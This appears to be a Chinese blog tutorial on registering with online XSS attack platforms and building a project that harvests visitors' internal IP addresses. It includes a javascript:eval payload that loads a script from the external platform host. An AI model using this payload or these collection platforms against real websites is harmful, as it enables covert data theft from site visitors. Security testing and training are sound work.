web安全:XSS测试平台使用教程

最新推荐文章于 2024-05-19 16:15:23 发布
最新推荐文章于 2024-05-19 16:15:23 发布
阅读量2.2w 收藏 77
点赞数 9
分类专栏: 安全技术 各种好玩的信息安全 文章标签: XSS XSS平台
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_17046291/article/details/99336431
版权

我接触使用过三个XSS平台
1.脚本非常丰富:http://www.1oad.com
2.简约:https://xsspt.com
3.非常好用,自带模块成功获取到了内网ip(上面两个都没有成功):https://xsshs.cn
所以我这个文章也是简单的说说如何使用XSS平台,以第三个平台为例说明;

一、注册用户并登录

在这里插入图片描述

二、创建项目

1.创建项目,创建完后会生成一个xss可用脚本地址
在这里插入图片描述
项目名称随意,项目描述随意;但是创建之后就不能更改了。

2.有很多可用的模块,我们这次要构建一个获取计算机内网ip地址的xss脚本,所以勾选获取内网ip模块;在这里插入图片描述

这里也选择上在这里插入图片描述
点击下一步就创建成功一个项目,如下:
在这里插入图片描述
上图中“xsshs.cn/JI9q” 就是本次构建攻击脚本,其中 JI9q就是id;

三、如何使用

(本次测试方法为自己本地测试----就是自己攻击自己,假设已经成功xss,然后查看xss的效果)
打开任意网站例如百度,如后输入

javascript:eval('window.s=document.createElement("script");window.s.src="//xsshs.cn/JI9q";document.body.appendChild(window.s)')
注意:其中src换成你自己的攻击脚本即可,然后回车

在这里插入图片描述
此时返回xss平台:
在这里插入图片描述
以上XSS平台 测试演示成功;

一定要多多利用平台上面各种脚本,那个才是根本,然后自己买一个VPS,不用这个平台也是可以的。

硬核Top
关注
  • 9
    点赞
  • 77
    收藏
    觉得还不错? 一键收藏
  • 19
    评论
专栏目录
XSS测试平台使用
Fly_鹏程万里
08-07 2056
这里推荐一个常用的XSS平台xsspt.com,下面是该平台使用教程~ XSSPT使用方法: 注册 如果没有账户,可以通过“注册”来注册一个账户: 登录 使用注册的账户登录进行登录认证,之后即可进入主页面 功能界面介绍 a、主界面 B、辅助选项 C、学习 该模块披露了一些已经修复的漏洞,有助于自我学习与实践 D、友情链接与历史 友情链接可以帮助你...
xsser_platform:《 Web安全攻防:渗透测试实战指南》 XSS测试平台原始码
03-23
xsser_platform:《 Web安全攻防:渗透测试实战指南》 XSS测试平台原始码
-xsser.me-:XSS平台
03-23
-xsser.me-:XSS平台源码
XSS另类攻击(一)在线平台监控Cookie
最新发布
05-19 759
XSS另类攻击(一)在线平台监控Cookie,实现权限维持。
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 586
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
XSS练习平台XSS Challenges】通关秘籍
W小哥
03-02 2209
靶场介绍 靶场地址:http://xss-quiz.int21h.jp/ 相对于别的靶场来说,这是一个模拟真实环境的xss平台,页面不会给出任何提示 Stage #1 访问目标网站如下图所示 提示:注入以下JavaScript命令 “alert(document.domain)” 输入注入语句: 思路:最简单测试方法,没有任何过滤,注入语句在b标签内 Stage #2 注入语句:1">...
收集了一些XSS攻击平台
gdhjgfr的博客
11-04 1807
分享一下我老师大神的人工智能教程!零基础,通俗易懂!http://blog.csdn.net/jiangjunshow也欢迎大家转载本篇文章。分享知识,造福人民,实现我们中华民族伟大复兴!                Attack APIB
HTML 事件
weixin_30325487的博客
02-11 187
1、HTML 全局事件属性   HTML4 的新特性之一就是可以使 HTML 事件触发浏览器中的行为,比方说当用户点击某个 HTML 元素时启动一段 JavaScript,在 HTML5 中还增加了一些新的事件属性。   HTML 事件就是发生在 HTML 元素上的事情。当在 HTML 页面中使用 JavaScript 时, JavaScript 就可以触发这些事件。HTML 事件可以是浏览器...
XSS数据接收网站——XSS在线平台
p36273的博客
06-17 5002
平台的网址是:链接:XSS在线平台
搭建XSS (跨网站指令码) 测试平台
_Co1a
12-09 1132
网站指令码(英语:Cross-site scripting,通常简称为:XSS)是一种网站应用程式的安全漏洞攻击,是代码注入的一种。它允许恶意使用者将程式码注入到网页上,其他使用者在观看网页时就会受到影响。这类攻击通常包含了HTML以及使用者端脚本语言。 XSS测试平台测试XSS漏洞获取cookie并接收Web页面的平台XSS可以做JS能做的所有事情,包括但不限于窃取cookie、后台增删文章、钓鱼、利用XSS漏洞经行传播、修改网页代码、网站重定向、获取用户信息(比如浏览器信息、IP地址)等。 书.
Web漏洞-XSS平台简介-相关知识点补充(cookie与session)
ran的博客
03-14 1969
首页(注册)。成功注册后的主页。按照如下路径填写相关信息后点击下一步。之后会返回项目相关的功能。勾选默认模块后点击下一步。点击下一步后,平台会为你创建一个项目。下滑后可以看到平台生成的测试语句。这里我们引用平台生成的最后一条语句。输入网站内的对应位置后点击提交。可以看到成功提交了。来到管理员界面可以看到查看留言的位置。点击进入查看后便发现网站弹出了一个弹窗,说明网站成功执行了js代码。
XSS测试平台.zip
08-06
XSS测试平台测试XSS漏洞获取cookie并接收Web页面的平台
Web-安全渗透全套教程XSS跨.zip
05-22
Web安全渗透是网络安全领域的重要部分,特别是针对Web应用程序的安全测试和防护。XSS(Cross-Site Scripting,跨站脚本攻击)是其中一种常见的安全漏洞,它允许攻击者通过在网页上注入恶意脚本,进而对用户浏览器...
web安全渗透测试.7z
04-08
Web安全领域,渗透测试常常涵盖SQL注入、XSS攻击、文件包含漏洞、命令注入、权限绕过等测试项目。 【压缩包子文件的文件名称列表】 1. **lanmp.sh** - 这可能是一个安装LAMP(Linux, Apache, MySQL, PHP)环境的...
Web-安全渗透全套教程20XSS跨.zip
05-22
【标题】"Web-安全渗透全套教程20XSS跨.zip"揭示了这是一份关于Web安全渗透测试的教育资料,特别关注XSS(Cross-Site Scripting,跨站脚本攻击)这一主题。XSS是一种常见的网络安全漏洞,攻击者通过注入恶意脚本到...
XSS平台】使用(1),网络安全插件化+模块化+组件化+热修复
m0_60721649的博客
04-08 377
对于从来没有接触过网络安全的同学,我们帮你准备了详细的学习成长路线图。可以说是最科学最系统的学习路线,大家跟着这个大的方向学习准没问题。(img-aiKTf53h-1712591477079)]试辅导),让我们一起学习成长!因篇幅有限,仅展示部分资料。
XSS平台的使用
weixin_47306547的博客
09-16 4917
1)注册并登录 https://xss.pt/xss.php?do=register 2)创建项目及其用法 <?php $input = $_GET['input']; echo "<div>".$input."</div>"; ?>
pikachu漏洞练习平台XSS
m0_55854679的博客
05-09 2866
XSS案例 get方式获取cookie图解 pkxss管理后台使用介绍 在绝对路径D:\phpstudy_pro\WWW\pikachu-master\pkxss下找到pkxss管理后台。 也可以点击,pikachu靶场的左侧漏洞栏最下面的管理工具下的xss后台,并进行初始化安装。 初始化安装后,输入页面提示的用户名和密码,即可成功进入pkxss管理后台。 get方式获取cookie方法 在目录D:\phpstudy_pro\WWW\pikachu-master\pkxss\xcookie下找
手把手教你搭建XSS平台
热门推荐
seek_2022的博客
05-05 1万+
出于学习和技术分享的目的研究了一下XSS平台搭建的方法,由于网络上的教程虽然很多,但是对于很多细节的讲解不够深入,现将XSS平台搭建方法分享给大家。
vega测试工具使用教程
05-05
Vega是一款开源的Web应用程序安全测试平台,可用于测试Web应用程序的安全性。以下是Vega测试工具的使用教程: 1. 下载安装Vega:您可以从Vega的官方网站(https://subgraph.com/vega/)下载最新版本的Vega,然后按照安装向导进行安装。 2. 创建一个新的扫描项目:启动Vega后,单击“File”菜单中的“New Scan”选项,然后输入要扫描的URL和扫描名称。 3. 配置扫描选项:在“Scan Configuration”对话框中,您可以选择要使用的扫描选项。例如,您可以选择自动进行XSS和SQL注入检查,或者只检查特定的漏洞类型。 4. 启动扫描:单击“Start Scan”按钮开始扫描。 Vega将开始自动扫描您的应用程序,并在扫描过程中显示进度信息和扫描结果。 5. 查看扫描结果:扫描完成后,您可以查看扫描结果并查找漏洞。在左侧的“Scan Tree”面板中,您可以查看扫描结果的摘要。右侧的“Scan Details”面板中,您可以查看详细的扫描报告。 6. 导出扫描结果:您可以将扫描结果导出到HTML或PDF格式的报告中,以便进一步分析和分享。 总之,使用Vega测试工具进行Web应用程序的安全测试非常简单,只需几个简单的步骤即可完成。但请注意,Vega是一款强大的测试工具,需要谨慎使用,以避免对您的应用程序造成不必要的损害。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 19
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值